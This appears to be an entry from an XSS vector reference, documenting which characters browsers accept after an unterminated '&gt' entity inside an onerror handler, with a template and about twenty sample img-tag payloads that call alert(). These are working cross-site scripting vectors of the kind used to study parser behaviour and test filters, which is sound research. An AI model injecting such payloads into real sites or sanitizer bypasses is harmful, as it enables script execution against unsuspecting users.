Characters allowed after greater than in events

This vector shows which characters are ignored after the greater than entity without a semi-colon

Created Jun 21, 2024

Updated May 27, 2025

Detecting browser...

CategoryHTML Parsing

VisibilityPublic

TypeXSS

CharsetUTF-8

Template used:

<img src=data: onerror="1&gt$[chr] log($[i])">

Sample payloads

<img src=data: onerror="1&gt⟦09⟧ alert(9)">

<img src=data: onerror="1&gt
 alert(10)">

<img src=data: onerror="1&gt0x0B alert(11)">

<img src=data: onerror="1&gt0x0C alert(12)">

<img src=data: onerror="1&gt0x0D alert(13)">

<img src=data: onerror="1&gt  alert(32)">

<img src=data: onerror="1&gt! alert(33)">

<img src=data: onerror="1&gt+ alert(43)">

<img src=data: onerror="1&gt- alert(45)">

<img src=data: onerror="1&gt; alert(59)">

<img src=data: onerror="1&gt> alert(62)">

<img src=data: onerror="1&gt~ alert(126)">

<img src=data: onerror="1&gt  alert(160)">

<img src=data: onerror="1&gt  alert(5760)">

<img src=data: onerror="1&gt  alert(8192)">

<img src=data: onerror="1&gt  alert(8193)">

<img src=data: onerror="1&gt  alert(8194)">

<img src=data: onerror="1&gt  alert(8195)">

<img src=data: onerror="1&gt  alert(8196)">

<img src=data: onerror="1&gt  alert(8197)">